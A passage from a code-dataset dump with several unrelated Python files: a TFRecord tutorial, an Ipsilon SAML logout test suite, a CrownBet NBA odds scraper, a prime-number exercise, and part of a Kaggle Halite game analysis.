Coefficients, given as a 'tmat' object.\n '''\n nrms = norms(ao_overlaps, coeffs)\n \n return normalize(coeffs, nrms)\n","repo_name":"audunsh/XDEC","sub_path":"utils/orb_functions.py","file_name":"orb_functions.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26343641204","text":"print(\"Program Menampilkan Bilangan Prima dari 1-100\")\na=2\nwhile(a <= 100):\n b=2\n while(b <= (a/b)):\n if not(a%b):\n break\n b+=1\n if (b > a/b):\n print(a)\n a+=1\nprint(\"Selesai\")","repo_name":"MIRX562/Practice","sub_path":"Latihan 2/Program bilangan prima.py","file_name":"Program bilangan prima.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17912357892","text":"import tensorflow as tf\n\nimport numpy as np\nimport IPython.display as display\n\n\"\"\"## `tf.Example`\n\n### Data types for `tf.Example`\n\nFundamentally a `tf.Example` is a `{\"string\": tf.train.Feature}` mapping.\n\nThe `tf.train.Feature` message type can accept one of the following three types (See the [`.proto` file]((https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/example/feature.proto) for reference). Most other generic types can be coerced into one of these.\n\n1. `tf.train.BytesList` (the following types can be coerced)\n\n- `string`\n- `byte`\n\n1. `tf.train.FloatList` (the following types can be coerced)\n\n- `float` (`float32`)\n- `double` (`float64`)\n\n1. `tf.train.Int64List` (the following types can be coerced)\n\n- `bool`\n- `enum`\n- `int32`\n- `uint32`\n- `int64`\n- `uint64`\n\nIn order to convert a standard TensorFlow type to a `tf.Example`-compatible `tf.train.Feature`, you can use the following shortcut functions:\n\nEach function takes a scalar input value and returns a `tf.train.Feature` containing one of the three `list` types above.\n\"\"\"\n\n# The following functions can be used to convert a value to a type compatible\n# with tf.Example.\n\n\ndef _bytes_feature(value):\n \"\"\"Returns a bytes_list from a string / byte.\"\"\"\n if isinstance(value, type(tf.constant(0))):\n value = value.numpy() # BytesList won't unpack a string from an EagerTensor.\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _float_feature(value):\n \"\"\"Returns a float_list from a float / double.\"\"\"\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\ndef _int64_feature(value):\n \"\"\"Returns an int64_list from a bool / enum / int / uint.\"\"\"\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\n\"\"\"Note: To stay simple, this example only uses scalar inputs. The simplest way to handle non-scalar features is to use `tf.serialize_tensor` to convert tensors to binary-strings. Strings are scalars in tensorflow. Use `tf.parse_tensor` to convert the binary-string back to a tensor.\n\nBelow are some examples of how these functions work. Note the varying input types and the standardizes output types. If the input type for a function does not match one of the coercible types stated above, the function will raise an exception (e.g. `_int64_feature(1.0)` will error out, since `1.0` is a float, so should be used with the `_float_feature` function instead).\n\"\"\"\n\nprint(_bytes_feature(b'test_string'))\nprint(_bytes_feature(u'test_bytes'.encode('utf-8')))\n\nprint(_float_feature(np.exp(1)))\n\nprint(_int64_feature(True))\nprint(_int64_feature(1))\n\n\"\"\"All proto messages can be serialized to a binary-string using the `.SerializeToString` method.\"\"\"\n\nfeature = _float_feature(np.exp(1))\n\nfeature.SerializeToString()\n\n\"\"\"### Creating a `tf.Example` message\n\nSuppose you want to create a `tf.Example` message from existing data. In practice, the dataset may come from anywhere, but the procedure of creating the `tf.Example` message from a single observation will be the same.\n\n1. Within each observation, each value needs to be converted to a `tf.train.Feature` containing one of the 3 compatible types, using one of the functions above.\n\n1. We create a map (dictionary) from the feature name string to the encoded feature value produced in #1.\n\n1. The map produced in #2 is converted to a [`Features` message](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/example/feature.proto#L85).\n\nIn this notebook, we will create a dataset using NumPy.\n\nThis dataset will have 4 features.\n- a boolean feature, `False` or `True` with equal probability\n- an integer feature uniformly randomly chosen from `[0, 5)`\n- a string feature generated from a string table by using the integer feature as an index\n- a float feature from a standard normal distribution\n\nConsider a sample consisting of 10,000 independently and identically distributed observations from each of the above distributions.\n\"\"\"\n\n# the number of observations in the dataset\nn_observations = int(1e4)\n\n# boolean feature, encoded as False or True\nfeature0 = np.random.choice([False, True], n_observations)\n\n# integer feature, random from 0 .. 4\nfeature1 = np.random.randint(0, 5, n_observations)\n\n# string feature\nstrings = np.array([b'cat', b'dog', b'chicken', b'horse', b'goat'])\nfeature2 = strings[feature1]\n\n# float feature, from a standard normal distribution\nfeature3 = np.random.randn(n_observations)\n\n\"\"\"Each of these features can be coerced into a `tf.Example`-compatible type using one of `_bytes_feature`, `_float_feature`, `_int64_feature`. We can then create a `tf.Example` message from these encoded features.\"\"\"\n\n\ndef serialize_example(feature0, feature1, feature2, feature3):\n \"\"\"\n Creates a tf.Example message ready to be written to a file.\n \"\"\"\n # Create a dictionary mapping the feature name to the tf.Example-compatible\n # data type.\n feature = {\n 'feature0': _int64_feature(feature0),\n 'feature1': _int64_feature(feature1),\n 'feature2': _bytes_feature(feature2),\n 'feature3': _float_feature(feature3),\n }\n\n # Create a Features message using tf.train.Example.\n\n example_proto = tf.train.Example(features=tf.train.Features(feature=feature))\n return example_proto.SerializeToString()\n\n\n\"\"\"For example, suppose we have a single observation from the dataset, `[False, 4, bytes('goat'), 0.9876]`. We can create and print the `tf.Example` message for this observation using `create_message()`. Each single observation will be written as a `Features` message as per the above. Note that the `tf.Example` [message](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/example/example.proto#L88) is just a wrapper around the `Features` message.\"\"\"\n\n# This is an example observation from the dataset.\n\nexample_observation = []\n\nserialized_example = serialize_example(False, 4, b'goat', 0.9876)\n\n\"\"\"To decode the message use the `tf.train.Example.FromString` method.\"\"\"\n\nexample_proto = tf.train.Example.FromString(serialized_example)\n\n\"\"\"## TFRecords Format Details\n\nA TFRecord file contains a sequence of records. The file can only be read sequentially.\n\nEach record contains a byte-string, for the data-payload, plus the data-length, and CRC32C (32-bit CRC using the Castagnoli polynomial) hashes for integrity checking.\n\nEach record has the format\n\n uint64 length\n uint32 masked_crc32_of_length\n byte data[length]\n uint32 masked_crc32_of_data\n\nThe records are concatenated together to produce the file. CRCs are\n[described here](https://en.wikipedia.org/wiki/Cyclic_redundancy_check), and\nthe mask of a CRC is\n\n masked_crc = ((crc >> 15) | (crc << 17)) + 0xa282ead8ul\n\nNote: There is no requirement to use `tf.Example` in TFRecord files. `tf.Example` is just a method of serializing dictionaries to byte-strings. Lines of text, encoded image data, or serialized tensors (using `tf.io.serialize_tensor`, and\n`tf.io.parse_tensor` when loading). See the `tf.io` module for more options.\n\n## TFRecord files using `tf.data`\n\nThe `tf.data` module also provides tools for reading and writing data in tensorflow.\n\n### Writing a TFRecord file\n\nThe easiest way to get the data into a dataset is to use the `from_tensor_slices` method.\n\nApplied to an array, it returns a dataset of scalars.\n\"\"\"\n\ntf.data.Dataset.from_tensor_slices(feature1)\n\n\"\"\"Applies to a tuple of arrays, it returns a dataset of tuples:\"\"\"\n\nfeatures_dataset = tf.data.Dataset.from_tensor_slices((feature0, feature1, feature2, feature3))\n\n# Use `take(1)` to only pull one example from the dataset.\nfor f0, f1, f2, f3 in features_dataset.take(1):\n print(f0)\n print(f1)\n print(f2)\n print(f3)\n\n\"\"\"Use the `tf.data.Dataset.map` method to apply a function to each element of a `Dataset`.\n\nThe mapped function must operate in TensorFlow graph mode: It must operate on and return `tf.Tensors`. A non-tensor function, like `create_example`, can be wrapped with `tf.py_function` to make it compatible.\n\nUsing `tf.py_function` requires that you specify the shape and type information that is otherwise unavailable:\n\"\"\"\n\n\ndef tf_serialize_example(f0, f1, f2, f3):\n tf_string = tf.py_function(\n serialize_example,\n (f0, f1, f2, f3), # pass these args to the above function.\n tf.string) # the return type is `tf.string`.\n return tf.reshape(tf_string, ()) # The result is a scalar\n\n\ntf_serialize_example(f0, f1, f2, f3)\n\n\"\"\"Apply this function to each element in the dataset:\"\"\"\n\nserialized_features_dataset = features_dataset.map(tf_serialize_example)\n\n\ndef generator():\n for features in features_dataset:\n yield serialize_example(*features)\n\n\nserialized_features_dataset = tf.data.Dataset.from_generator(\n generator, output_types=tf.string, output_shapes=())\n\n\n\"\"\"And write them to a TFRecord file:\"\"\"\n\nfilename = 'test.tfrecord'\nwriter = tf.data.experimental.TFRecordWriter(filename)\nwriter.write(serialized_features_dataset)\n\n\"\"\"### Reading a TFRecord file\n\nWe can also read the TFRecord file using the `tf.data.TFRecordDataset` class.\n\nMore information on consuming TFRecord files using `tf.data` can be found [here](https://www.tensorflow.org/guide/datasets#consuming_tfrecord_data).\n\nUsing `TFRecordDataset`s can be useful for standardizing input data and optimizing performance.\n\"\"\"\n\nfilenames = [filename]\nraw_dataset = tf.data.TFRecordDataset(filenames)\n\n\"\"\"At this point the dataset contains serialized `tf.train.Example` messages. When iterated over it returns these as scalar string tensors.\n\nUse the `.take` method to only show the first 10 records.\n\nNote: iterating over a `tf.data.Dataset` only works with eager execution enabled.\n\"\"\"\n\nfor raw_record in raw_dataset.take(10):\n print(repr(raw_record))\n\n\"\"\"These tensors can be parsed using the function below.\n\nNote: The `feature_description` is necessary here because datasets use graph-execution, and need this description to build their shape and type signature.\n\"\"\"\n\n# Create a description of the features.\nfeature_description = {\n 'feature0': tf.io.FixedLenFeature([], tf.int64, default_value=0),\n 'feature1': tf.io.FixedLenFeature([], tf.int64, default_value=0),\n 'feature2': tf.io.FixedLenFeature([], tf.string, default_value=''),\n 'feature3': tf.io.FixedLenFeature([], tf.float32, default_value=0.0),\n}\n\n\ndef _parse_function(example_proto):\n # Parse the input tf.Example proto using the dictionary above.\n return tf.io.parse_single_example(example_proto, feature_description)\n\n\n\"\"\"Or use `tf.parse example` to parse a whole batch at once.\n\nApply this finction to each item in the dataset using the `tf.data.Dataset.map` method:\n\"\"\"\n\nparsed_dataset = raw_dataset.map(_parse_function)\n\n\"\"\"Use eager execution to display the observations in the dataset. There are 10,000 observations in this dataset, but we only display the first 10. The data is displayed as a dictionary of features. Each item is a `tf.Tensor`, and the `numpy` element of this tensor displays the value of the feature.\"\"\"\n\nfor parsed_record in parsed_dataset.take(10):\n print(repr(parsed_record))\n\n\"\"\"Here, the `tf.parse_example` function unpacks the `tf.Example` fields into standard tensors.\n\n## TFRecord files in python\n\nThe `tf.io` module also contains pure-Python functions for reading and writing TFRecord files.\n\n### Writing a TFRecord file\n\nNow write the 10,000 observations to the file `test.tfrecords`. Each observation is converted to a `tf.Example` message, then written to file. We can then verify that the file `test.tfrecords` has been created.\n\"\"\"\n\n# Write the `tf.Example` observations to the file.\nwith tf.io.TFRecordWriter(filename) as writer:\n for i in range(n_observations):\n example = serialize_example(feature0[i], feature1[i], feature2[i], feature3[i])\n writer.write(example)\n\n\n\"\"\"### Reading a TFRecord file\n\nThese serialized tensores can be easily parsed using `tf.train.Example.ParseFromString`\n\"\"\"\n\nfilenames = [filename]\nraw_dataset = tf.data.TFRecordDataset(filenames)\n\nfor raw_record in raw_dataset.take(1):\n example = tf.train.Example()\n example.ParseFromString(raw_record.numpy())\n print(example)\n\n\"\"\"## Walkthrough: Reading/Writing Image Data\n\nThis is an example of how to read and write image data using TFRecords. The purpose of this is to show how, end to end, input data (in this case an image) and write the data as a TFRecord file, then read the file back and display the image.\n\nThis can be useful if, for example, you want to use several models on the same input dataset. Instead of storing the image data raw, it can be preprocessed into the TFRecords format, and that can be used in all further processing and modelling.\n\nFirst, let's download [this image](https://commons.wikimedia.org/wiki/File:Felis_catus-cat_on_snow.jpg) of a cat in the snow and [this photo](https://upload.wikimedia.org/wikipedia/commons/f/fe/New_East_River_Bridge_from_Brooklyn_det.4a09796u.jpg) of the Williamsburg Bridge, NYC under construction.\n\n### Fetch the images\n\"\"\"\n\ncat_in_snow = tf.keras.utils.get_file('320px-Felis_catus-cat_on_snow.jpg', 'https://storage.googleapis.com/download.tensorflow.org/example_images/320px-Felis_catus-cat_on_snow.jpg')\nwilliamsburg_bridge = tf.keras.utils.get_file('194px-New_East_River_Bridge_from_Brooklyn_det.4a09796u.jpg', 'https://storage.googleapis.com/download.tensorflow.org/example_images/194px-New_East_River_Bridge_from_Brooklyn_det.4a09796u.jpg')\n\ndisplay.display(display.Image(filename=cat_in_snow))\ndisplay.display(display.HTML('Image cc-by: Von.grzanka'))\n\ndisplay.display(display.Image(filename=williamsburg_bridge))\ndisplay.display(display.HTML('From Wikimedia'))\n\n\"\"\"### Write the TFRecord file\n\nAs we did earlier, we can now encode the features as types compatible with `tf.Example`. In this case, we will not only store the raw image string as a feature, but we will store the height, width, depth, and an arbitrary `label` feature, which is used when we write the file to distinguish between the cat image and the bridge image. We will use `0` for the cat image, and `1` for the bridge image.\n\"\"\"\n\nimage_labels = {\n cat_in_snow: 0,\n williamsburg_bridge: 1,\n}\n\n# This is an example, just using the cat image.\nimage_string = open(cat_in_snow, 'rb').read()\n\nlabel = image_labels[cat_in_snow]\n\n# Create a dictionary with features that may be relevant.\n\n\ndef image_example(image_string, label):\n image_shape = tf.image.decode_jpeg(image_string).shape\n\n feature = {\n 'height': _int64_feature(image_shape[0]),\n 'width': _int64_feature(image_shape[1]),\n 'depth': _int64_feature(image_shape[2]),\n 'label': _int64_feature(label),\n 'image_raw': _bytes_feature(image_string),\n }\n\n return tf.train.Example(features=tf.train.Features(feature=feature))\n\n\nfor line in str(image_example(image_string, label)).split('\\n')[:15]:\n print(line)\nprint('...')\n\n\"\"\"We see that all of the features are now stores in the `tf.Example` message. Now, we functionalize the code above and write the example messages to a file, `images.tfrecords`.\"\"\"\n\n# Write the raw image files to images.tfrecords.\n# First, process the two images into tf.Example messages.\n# Then, write to a .tfrecords file.\nrecord_file = 'images.tfrecords'\nwith tf.io.TFRecordWriter(record_file) as writer:\n for filename, label in image_labels.items():\n image_string = open(filename, 'rb').read()\n tf_example = image_example(image_string, label)\n writer.write(tf_example.SerializeToString())\n\n\n\"\"\"### Read the TFRecord file\n\nWe now have the file `images.tfrecords`. We can now iterate over the records in the file to read back what we wrote. Since, for our use case we will just reproduce the image, the only feature we need is the raw image string. We can extract that using the getters described above, namely `example.features.feature['image_raw'].bytes_list.value[0]`. We also use the labels to determine which record is the cat as opposed to the bridge.\n\"\"\"\n\nraw_image_dataset = tf.data.TFRecordDataset('images.tfrecords')\n\n# Create a dictionary describing the features.\nimage_feature_description = {\n 'height': tf.io.FixedLenFeature([], tf.int64),\n 'width': tf.io.FixedLenFeature([], tf.int64),\n 'depth': tf.io.FixedLenFeature([], tf.int64),\n 'label': tf.io.FixedLenFeature([], tf.int64),\n 'image_raw': tf.io.FixedLenFeature([], tf.string),\n}\n\n\ndef _parse_image_function(example_proto):\n # Parse the input tf.Example proto using the dictionary above.\n return tf.io.parse_single_example(example_proto, image_feature_description)\n\n\nparsed_image_dataset = raw_image_dataset.map(_parse_image_function)\n\n\"\"\"Recover the images from the TFRecord file:\"\"\"\n\nfor image_features in parsed_image_dataset:\n image_raw = image_features['image_raw'].numpy()\n display.display(display.Image(data=image_raw))\n","repo_name":"Lornatang/TensorFlow2-tutorials","sub_path":"Experts_tutorial/Load_data/tf_records.py","file_name":"tf_records.py","file_ext":"py","file_size_in_byte":16896,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"29902828455","text":"from helpers.common import IpsilonTestBase # pylint: disable=relative-import\nfrom helpers.control import TC # pylint: disable=relative-import\nfrom helpers.http import HttpSessions # pylint: disable=relative-import\nimport os\nimport pwd\nfrom string import Template\n\n\nidp_g = {'TEMPLATES': '${TESTDIR}/templates/install',\n 'CONFDIR': '${TESTDIR}/etc',\n 'DATADIR': '${TESTDIR}/lib',\n 'CACHEDIR': '${TESTDIR}/cache',\n 'HTTPDCONFD': '${TESTDIR}/${NAME}/conf.d',\n 'STATICDIR': '${ROOTDIR}',\n 'BINDIR': '${ROOTDIR}/ipsilon',\n 'WSGI_SOCKET_PREFIX': '${TESTDIR}/${NAME}/logs/wsgi'}\n\n\nidp_a = {'hostname': '${ADDRESS}:${PORT}',\n 'admin_user': '${TEST_USER}',\n 'system_user': '${TEST_USER}',\n 'instance': '${NAME}',\n 'testauth': 'yes',\n 'pam': 'no',\n 'gssapi': 'no',\n 'ipa': 'no',\n 'server_debugging': 'True'}\n\n\nsp_g = {'HTTPDCONFD': '${TESTDIR}/${NAME}/conf.d',\n 'SAML2_TEMPLATE': '${TESTDIR}/templates/install/saml2/sp.conf',\n 'CONFFILE': '${TESTDIR}/${NAME}/conf.d/ipsilon-%s.conf',\n 'HTTPDIR': '${TESTDIR}/${NAME}/%s'}\n\n\nsp_a = {'hostname': '${ADDRESS}',\n 'saml_idp_metadata': 'https://127.0.0.10:45080/idp1/saml2/metadata',\n 'saml_auth': '/sp',\n 'httpd_user': '${TEST_USER}'}\n\n\nsp_b = {'hostname': '${ADDRESS}',\n 'saml_idp_metadata': 'https://127.0.0.10:45080/idp1/saml2/metadata',\n 'no_saml_soap_logout': 'True',\n 'saml_auth': '/sp',\n 'httpd_user': '${TEST_USER}'}\n\n\n# Global list of SP's\nsplist = [\n {\n 'nameid': 'sp1',\n 'addr': '127.0.0.11',\n 'port': '45081',\n },\n {\n 'nameid': 'sp2',\n 'addr': '127.0.0.11',\n 'port': '45082',\n },\n {\n 'nameid': 'sp3',\n 'addr': '127.0.0.11',\n 'port': '45083',\n },\n {\n 'nameid': 'sp4',\n 'addr': '127.0.0.11',\n 'port': '45084',\n },\n {\n 'nameid': 'sp5',\n 'addr': '127.0.0.11',\n 'port': '45085',\n },\n]\n\n\ndef fixup_sp_httpd(httpdir):\n location = \"\"\"\n\nAlias /sp ${HTTPDIR}/sp\n\n\n \n Require all granted\n \n \n Order Allow,Deny\n Allow from All\n \n\n\nAlias /open ${HTTPDIR}/open\n\n\n\n\"\"\"\n index = \"\"\"WORKS!\"\"\"\n logged_out = \"\"\"Logged out\"\"\"\n\n t = Template(location)\n text = t.substitute({'HTTPDIR': httpdir})\n with open(httpdir + '/conf.d/ipsilon-saml.conf', 'a') as f:\n f.write(text)\n\n os.mkdir(httpdir + '/sp')\n with open(httpdir + '/sp/index.html', 'w') as f:\n f.write(index)\n os.mkdir(httpdir + '/open')\n with open(httpdir + '/open/logged_out.html', 'w') as f:\n f.write(logged_out)\n\n\ndef ensure_logout(session, idp_name, sp_url):\n \"\"\"\n Fetch the secure page without following redirects. If we get\n a 303 then we should be redirected to the IDP for authentication\n which means we aren't logged in.\n\n Returns nothing or raises exception on error\n \"\"\"\n try:\n logout_page = session.fetch_page(idp_name, sp_url,\n follow_redirect=False)\n if logout_page.result.status_code != 303:\n raise ValueError('Still logged into url')\n except ValueError:\n raise\n\n return True\n\n\nclass IpsilonTest(IpsilonTestBase):\n\n def __init__(self):\n super(IpsilonTest, self).__init__('testlogout', __file__)\n\n def setup_servers(self, env=None):\n self.setup_step(\"Installing IDP server\")\n name = 'idp1'\n addr = '127.0.0.10'\n port = '45080'\n idp = self.generate_profile(idp_g, idp_a, name, addr, port)\n conf = self.setup_idp_server(idp, name, addr, port, env)\n\n self.setup_step(\"Starting IDP's httpd server\")\n self.start_http_server(conf, env)\n\n for spdata in splist:\n nameid = spdata['nameid']\n addr = spdata['addr']\n port = spdata['port']\n self.setup_step(\"Installing SP server %s\" % nameid)\n\n # Configure sp3 and sp4 for only HTTP Redirect to test\n # that a mix of SOAP and HTTP Redirect will play nice\n # together.\n if nameid in ['sp3', 'sp4']:\n sp_prof = self.generate_profile(\n sp_g, sp_b, nameid, addr, str(port), nameid\n )\n else:\n sp_prof = self.generate_profile(\n sp_g, sp_a, nameid, addr, str(port), nameid\n )\n conf = self.setup_sp_server(sp_prof, nameid, addr, str(port), env)\n fixup_sp_httpd(os.path.dirname(conf))\n\n self.setup_step(\"Starting SP's httpd server\")\n self.start_http_server(conf, env)\n\n\nif __name__ == '__main__':\n\n idpname = 'idp1'\n user = pwd.getpwuid(os.getuid())[0]\n\n sess = HttpSessions()\n sess.add_server(idpname, 'https://127.0.0.10:45080', user, 'ipsilon')\n for sp in splist:\n spname = sp['nameid']\n spurl = 'https://%s:%s' % (sp['addr'], sp['port'])\n sess.add_server(spname, spurl)\n\n with TC.case('Authenticate to IdP'):\n sess.auth_to_idp(idpname)\n\n for sp in splist:\n spname = sp['nameid']\n with TC.case('Add SP Metadata for %s to IdP' % spname):\n sess.add_sp_metadata(idpname, spname)\n\n with TC.case('Logout without logging into SP'):\n page = sess.fetch_page(idpname, '%s/%s?%s' % (\n 'https://127.0.0.11:45081', 'saml2/logout',\n 'ReturnTo=https://127.0.0.11:45081/open/logged_out.html'))\n page.expected_value('text()', 'Logged out')\n\n with TC.case('Access SP Protected Area'):\n page = sess.fetch_page(idpname, 'https://127.0.0.11:45081/sp/')\n page.expected_value('text()', 'WORKS!')\n\n with TC.case('Logout from SP'):\n page = sess.fetch_page(idpname, '%s/%s?%s' % (\n 'https://127.0.0.11:45081', 'saml2/logout',\n 'ReturnTo=https://127.0.0.11:45081/open/logged_out.html'))\n page.expected_value('text()', 'Logged out')\n\n with TC.case('Try logout again'):\n page = sess.fetch_page(idpname, '%s/%s?%s' % (\n 'https://127.0.0.11:45081', 'saml2/logout',\n 'ReturnTo=https://127.0.0.11:45081/open/logged_out.html'))\n page.expected_value('text()', 'Logged out')\n\n with TC.case('Ensure logout'):\n ensure_logout(sess, idpname, 'https://127.0.0.11:45081/sp/')\n\n # Test logout from each of the SP's in the list to ensure that the\n # order of logout doesn't matter.\n for sporder in splist:\n with TC.case('Access SP PRotected Area of all SPs'):\n for sp in splist:\n spname = sp['nameid']\n spurl = 'https://%s:%s/sp/' % (sp['addr'], sp['port'])\n page = sess.fetch_page(idpname, spurl)\n page.expected_value('text()', 'WORKS!')\n\n with TC.case('Initiate logout from %s' % sporder['nameid']):\n logouturl = 'https://%s:%s' % (sp['addr'], sp['port'])\n page = sess.fetch_page(idpname, '%s/%s?%s' % (\n logouturl, 'saml2/logout',\n 'ReturnTo=https://127.0.0.11:45081/open/logged_out.html'))\n page.expected_value('text()', 'Logged out')\n\n with TC.case('Ensure logout of each SP'):\n for sp in splist:\n spname = sp['nameid']\n spurl = 'https://%s:%s/sp/' % (sp['addr'], sp['port'])\n ensure_logout(sess, idpname, spurl)\n\n # Test IdP-initiated logout\n with TC.case('Access SP Protected area of SP1'):\n page = sess.fetch_page(idpname, 'https://127.0.0.11:45081/sp/')\n page.expected_value('text()', 'WORKS!')\n\n with TC.case('Access SP Protected Area of SP2'):\n page = sess.fetch_page(idpname, 'https://127.0.0.11:45082/sp/')\n page.expected_value('text()', 'WORKS!')\n\n with TC.case('Access the IdP'):\n page = sess.fetch_page(idpname,\n 'https://127.0.0.10:45080/%s' % idpname)\n page.expected_value('//div[@id=\"welcome\"]/p/text()',\n 'Welcome %s!' % user)\n\n with TC.case('IdP-initiated logout'):\n page = sess.fetch_page(idpname,\n 'https://127.0.0.10:45080/%s/logout' % idpname)\n page.expected_value('//div[@id=\"content\"]/p/a/text()', 'Log In')\n\n with TC.case('Ensure logout of SP1'):\n ensure_logout(sess, idpname, 'https://127.0.0.11:45081/sp/')\n\n with TC.case('Ensure logout of SP2'):\n ensure_logout(sess, idpname, 'https://127.0.0.11:45082/sp/')\n\n with TC.case('Access the IdP'):\n page = sess.fetch_page(idpname,\n 'https://127.0.0.10:45080/%s/login' % idpname)\n page.expected_value('//div[@id=\"welcome\"]/p/text()',\n 'Welcome %s!' % user)\n\n with TC.case('IdP-initiated logout with no SP sessions'):\n page = sess.fetch_page(idpname,\n 'https://127.0.0.10:45080/%s/logout' % idpname)\n page.expected_value('//div[@id=\"logout\"]/p//text()',\n 'Successfully logged out.')\n","repo_name":"ipsilon-project/ipsilon","sub_path":"tests/testlogout.py","file_name":"testlogout.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"21585004294","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nfrom selenium import webdriver\n\n\ndef importCrownBetPage():\n #Opens the page and returns the html inside\n browser = webdriver.Chrome()\n url = \"https://crownbet.com.au/sports-betting/basketball/nba/\"\n browser.get(url)\n innerHTML = browser.execute_script(\"return document.body.innerHTML\")\n return innerHTML\n\ndef createCrownBetNBAMatchups():\n matchups = []\n currMatchup = ()\n pageHTML = importCrownBetPage()\n soup = BeautifulSoup(pageHTML, 'html5lib')\n#Crownbet organises their page in divs, so we find each div with the info we need\n matchupList = soup.findAll('div', {\"class\" : \"event-summary-table container-fluid visible-xs\"})\n for matchup in matchupList:\n #the info is contained in div \"rows\" so we retrieve them,\n matchupRows = matchup.findAll('div', {\"class\":\"row\"})\n #find the rows we need - the odds are in the 2nd and 5th rows,\n #and the name of the team is in the row before them.\n\n #for each team, get the name and odds and throw it into a tuple\n teamName1 = matchupRows[0]\n teamName1 = teamName1.find(\"span\", {\"class\":\"outcome-anchor-text\"}).text\n teamOdds1 = matchupRows[1]\n teamOdds1 = teamOdds1.find(\"span\", {\"class\":\"bet-amount\"}).text.strip()\n\n nameAndOdds1 = (teamName1, teamOdds1)\n\n teamName2 = matchupRows[3]\n teamName2 = teamName2.find(\"span\", {\"class\":\"outcome-anchor-text\"}).text\n teamOdds2 = matchupRows[4]\n teamOdds2 = teamOdds2.find(\"span\", {\"class\":\"bet-amount\"}).text.strip()\n nameAndOdds2 = (teamName2, teamOdds2)\n\n #then, create the currMatchup tuple and append it to the matchups list,\n #sorted by the highest odds first\n currMatchup = (nameAndOdds1, nameAndOdds2)\n sortedMatchup = sorted(currMatchup, key=lambda odds: odds[1], reverse=True)\n matchups.append(sortedMatchup)\n\n return matchups\n","repo_name":"cheelees/bettingScraper","sub_path":"crownBet.py","file_name":"crownBet.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71427322280","text":"import json\n\nfrom kaggle_environments.envs.halite.helpers import *\n\nfrom kaggle_environments import evaluate, make\n\nfrom kaggle_environments.envs.halite.helpers import *\n\nimport numpy as np\n\nimport pandas as pd\n\nwith open('../input/1235217json/1235217.json') as file:\n\n data = json.load(file)\n\n\n\nenv = make('halite', configuration=data['configuration'], steps=data['steps'])\n\nenv.render(mode=\"ipython\", width=800, height=600)\n\npre_count = 1\n\nsteps = []\n\nboard_halite = []\n\np0_halite = []\n\np1_halite = []\n\np2_halite = []\n\np3_halite = []\n\np0_cargo = []\n\np1_cargo = []\n\np2_cargo = []\n\np3_cargo = []\n\np0_ships = []\n\np1_ships = []\n\np2_ships = []\n\np3_ships = []\n\np0_shipyards = []\n\np1_shipyards = []\n\np2_shipyards = []\n\np3_shipyards = []\n\nconfiguration = env.configuration\n\n\n\nfor step_env in env.steps:\n\n observation = step_env[0]['observation']\n\n board = Board(observation, configuration)\n\n steps.append(observation['step'])\n\n last_step = observation['step']\n\n board_halite.append(sum(observation['halite']))\n\n p0_halite.append(board.players[0].halite)\n\n p1_halite.append(board.players[1].halite)\n\n p2_halite.append(board.players[2].halite)\n\n p3_halite.append(board.players[3].halite)\n\n p0_cargo.append(sum([ship.halite for ship in board.players[0].ships]))\n\n p1_cargo.append(sum([ship.halite for ship in board.players[1].ships]))\n\n p2_cargo.append(sum([ship.halite for ship in board.players[2].ships]))\n\n p3_cargo.append(sum([ship.halite for ship in board.players[3].ships]))\n\n p0_ships.append(len(board.players[0].ship_ids))\n\n p1_ships.append(len(board.players[1].ship_ids))\n\n p2_ships.append(len(board.players[2].ship_ids))\n\n p3_ships.append(len(board.players[3].ship_ids))\n\n p0_shipyards.append(len(board.players[0].shipyard_ids))\n\n p1_shipyards.append(len(board.players[1].shipyard_ids))\n\n p2_shipyards.append(len(board.players[2].shipyard_ids))\n\n p3_shipyards.append(len(board.players[3].shipyard_ids))\n\n\n\ndf = pd.DataFrame(\n\n data={'step': steps, 'board_halite': board_halite,\n\n 'p0_halite': p0_halite,\n\n 'p1_halite': p1_halite,\n\n 'p2_halite': p2_halite,\n\n 'p3_halite': p3_halite,\n\n 'p0_cargo': p0_cargo,\n\n 'p1_cargo': p1_cargo,\n\n 'p2_cargo': p2_cargo,\n\n 'p3_cargo': p3_cargo,\n\n 'p0_ships': p0_ships,\n\n 'p1_ships': p1_ships,\n\n 'p2_ships': p2_ships,\n\n 'p3_ships': p3_ships,\n\n 'p0_shipyards': p0_shipyards,\n\n 'p1_shipyards': p1_shipyards,\n\n 'p2_shipyards': p2_shipyards,\n\n 'p3_shipyards': p3_shipyards,\n\n },\n\n columns=['step', 'board_halite',\n\n 'p0_halite',\n\n 'p1_halite',\n\n 'p2_halite',\n\n 'p3_halite',\n\n 'p0_cargo',\n\n 'p1_cargo',\n\n 'p2_cargo',\n\n 'p3_cargo',\n\n 'p0_ships',\n\n 'p1_ships',\n\n 'p2_ships',\n\n 'p3_ships',\n\n 'p0_shipyards',\n\n 'p1_shipyards',\n\n 'p2_shipyards',\n\n 'p3_shipyards',\n\n ]\n\n)\n\ndf['p0_total_halite'] = df['p0_halite'] + df['p0_cargo']\n\ndf['p1_total_halite'] = df['p1_halite'] + df['p1_cargo']\n\ndf['p2_total_halite'] = df['p2_halite'] + df['p2_cargo']\n\ndf['p3_total_halite'] = df['p3_halite'] + df['p3_cargo']\n\n\n\ndf\ndf.describe()\nimport seaborn as sns\n\nimport numpy as np \n\nimport pandas as pd \n\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns; sns.set() \n\nsns.set()\n\ndf0 = pd.DataFrame(\n\ndata={'player':'p0','step': steps, 'board_halite': board_halite,\n\n 'halite': p0_halite,\n\n 'cargo': p0_cargo,\n\n 'ships': p0_ships,\n\n 